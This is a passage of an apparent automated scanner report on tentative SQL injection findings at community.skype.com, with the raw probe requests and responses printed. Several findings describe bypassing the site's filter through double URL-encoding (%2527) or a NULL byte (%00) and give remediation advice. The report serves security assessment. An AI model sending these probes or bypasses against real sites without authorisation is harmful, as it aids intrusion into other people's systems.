Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.25. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.27. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/kudos

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.28. http://community.skype.com/t5/help/faqpage/faq-category-id/participation [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/participation

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/participation%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/participation%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.29. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/help/faqpage/faq-category-id/qa?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/qa?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.31. http://community.skype.com/t5/help/faqpage/faq-category-id/video [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/video

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/video%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/video%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.32. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/iPad%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/iPad%2527%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.33. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.34. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPhone/bd-p/iPhone

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/iPhone/bd-p/iPhone?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/iPhone/bd-p/iPhone?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/notifications/notifymoderatorpage/message-uid/25246

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00''=1 HTTP/1.1
